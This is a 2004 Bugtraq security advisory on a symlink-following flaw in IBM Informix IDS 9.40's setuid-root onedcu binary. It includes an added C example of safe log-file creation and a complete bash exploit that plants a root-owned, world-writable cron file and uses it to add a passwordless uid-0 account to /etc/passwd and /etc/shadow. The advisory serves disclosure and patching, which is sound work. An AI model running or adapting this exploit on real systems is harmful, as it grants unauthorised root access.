Date: Thu, 29 Jan 2004 10:16:05 +0100 (CET)
From: pask@...n3s.com
To: bugtraq@...urityfocus.com
Subject: ----------========== OPEN3S-2003-08-08-eng-informix-onedcu ==========----------
	----------========== OPEN3S-2003-08-08-eng-informix-onedcu ==========----------

 Title:    Local Vulnerability in IBM Informix IDSv9.40 onedcu binary
 Date:     08-08-2003
 Platform: Only tested in Linux but can be exported to others.
 Impact:   Users with execute permission on ./bin/onedcu can create files
           with mode 666 owned by root.
 Author:   Juan Manuel Pascual Escriba <pask@...n3s.com>
 Status:   Solved by IBM Corp.


PROBLEM SUMMARY:

 There is a write-permission checking error in the onedcu binary that can be used by local
users with execute permission on onedcu to create or overwrite any file as root, with mode 666.


DESCRIPTION

onedcu is installed with mode 6755 (setuid and setgid) and owned by root.informix in my default installation:

[informix@...oni onedcu]$ ls -alc /home/informix-9.40/bin/onedcu
-rwsr-sr-x    1 root     informix  1066468 Aug  8 23:39 /home/informix-9.40/bin/onedcu


The binary doesn't drop privileges before writing its log and writes a file named "\001" (in the current working directory) owned by root:


IMPACT:

	Easy to overwrite or create new files owned by root (.rhosts, cron files) via link
injection: a symlink named "\001" in the working directory is followed by the setuid-root
process when it creates the log.
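The defect described above is the combination of two things: the log is created while still running as root, and the open follows a symlink placed by the unprivileged caller. The following is an added example (my own code, not onedcu's or IBM's; the function names are mine) of how a setuid-root logger avoids both, with a self-test that builds the symlink scenario from the advisory in a constructed temporary directory and checks that the link is refused and the honest log file is not world-writable.

```c
#define _GNU_SOURCE 1
/* Added example, not from the advisory: safe log-file creation for a
 * setuid-root program, plus a demo reproducing the "\001" symlink case. */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Permanently give up setuid/setgid privileges; returns 0 on success.
 * Group first, then user: once the uid is unprivileged, setgid() would fail. */
int drop_privileges(void)
{
    uid_t uid = getuid();
    gid_t gid = getgid();

    if (setgid(gid) != 0 || setuid(uid) != 0)
        return -1;
    /* Verify the drop took effect: for a setuid-root process setuid()
     * resets the real, effective and saved ids together. */
    if (geteuid() != uid || getegid() != gid)
        return -1;
    return 0;
}

/* Open (or create) a log file without following a symlink and without
 * trusting the caller's umask.  Returns a descriptor, or -1 with errno set.
 * If the final path component is a symlink, O_NOFOLLOW makes open() fail
 * with ELOOP instead of creating the link target as root. */
int open_log_safely(const char *path)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW | O_CLOEXEC, 0600);
    if (fd < 0)
        return -1;
    /* Refuse anything that is not a plain file with a single link (hard
     * links are the other way to redirect a root write). */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    /* The O_CREAT mode is masked by umask; make 0600 what is on disk. */
    if (fchmod(fd, 0600) != 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed scenario: a symlink named "\001" (onedcu's log name) pointing
 * at a file the caller wants created, next to an honest log path.  Returns 1
 * if the link is refused with ELOOP, the target is never created, and the
 * honest log comes out mode 0600 despite umask 000; 0 otherwise. */
int demo_link_injection(void)
{
    char dir[] = "/tmp/onedcu-demo-XXXXXX";
    char target[128], link[128], honest[128];
    struct stat st;
    int fd, ok = 1;

    if (mkdtemp(dir) == NULL)
        return 0;
    snprintf(target, sizeof target, "%s/target", dir);
    snprintf(link, sizeof link, "%s/\001", dir);
    snprintf(honest, sizeof honest, "%s/onedcu.log", dir);
    if (symlink(target, link) != 0)
        return 0;
    umask(000);                        /* the permissive umask the advisory's script sets */

    /* 1. the symlink is refused and nothing appears at the target */
    if (open_log_safely(link) != -1 || errno != ELOOP)
        ok = 0;
    if (stat(target, &st) == 0)        /* target must not exist */
        ok = 0;

    /* 2. an honest path still works and is not world-writable */
    fd = open_log_safely(honest);
    if (fd < 0 || fstat(fd, &st) != 0 || (st.st_mode & 0777) != 0600)
        ok = 0;
    if (fd >= 0)
        close(fd);

    unlink(link);
    unlink(honest);
    rmdir(dir);
    return ok;
}

int main(void)
{
    printf("privileges dropped: %s\n", drop_privileges() == 0 ? "yes" : "no");
    printf("symlink refused, honest log 0600: %s\n", demo_link_injection() ? "yes" : "no");
    return 0;
}
```

Dropping privileges first is the real fix; O_NOFOLLOW and the fstat check are defence in depth for the window before the drop, and they do not cover a symlink in a parent directory component, so the log directory itself must not be writable by the user who runs the binary.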

EXPLOIT

#!/bin/bash
# Proof of concept from the advisory: a symlink named "\001" in the working
# directory makes the setuid-root onedcu create its log file at the link
# target (here a cron job file) instead of in the directory itself.

ONEDCU=/home/informix-9.40/bin/onedcu
CRONFILE=/etc/cron.hourly/pakito
USER=pakito
DIR=./trash

export INFORMIXDIR=/home/informix-9.40/
export ONCONFIG=onconfig.std

# working directory that will hold the link
if [ -d "$DIR" ]; then
        echo Trash directory already created
else
        mkdir "$DIR"
fi

cd "$DIR"
# onedcu writes its log as "\001"; point that name at the cron file
if [ -L "$(echo -e "\001")" ]; then
        echo Link Already Created
else
        ln -s "$CRONFILE" "$(echo -e "\001")"
fi

# umask 000 is inherited by onedcu, so the file it creates is mode 666
umask 000
"$ONEDCU" &
kill -9 $(pidof "$ONEDCU")

# the cron file is now root-owned and world-writable; fill it in
echo '#!/bin/bash' > "$CRONFILE"
echo "echo '$USER:x:0:0::/:/bin/bash' >> /etc/passwd" >> "$CRONFILE"
echo "echo '$USER::12032:0:99999:7:::' >> /etc/shadow" >> "$CRONFILE"
echo " "
echo "  This vulnerability was researched by Juan Manuel Pascual Escriba"
echo "  08/08/2003 Barcelona - Spain pask@...n3s.com"
echo " "
echo "  must wait until cron executes $CRONFILE and then exec su $USER"



STATUS 

Reported to the IBM security team on 11 August 2003.

See more information about this vulnerability and a workaround at:
http://www-1.ibm.com/support/docview.wss?uid=swg21153336

This vulnerability was managed in an efficient manner by Jonathan Leffler 
from IBM Informix Database Engineering Team.


--------------------------------------------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba            pask@...n3s.com
Barcelona - Spain                      http://www.open3s.com
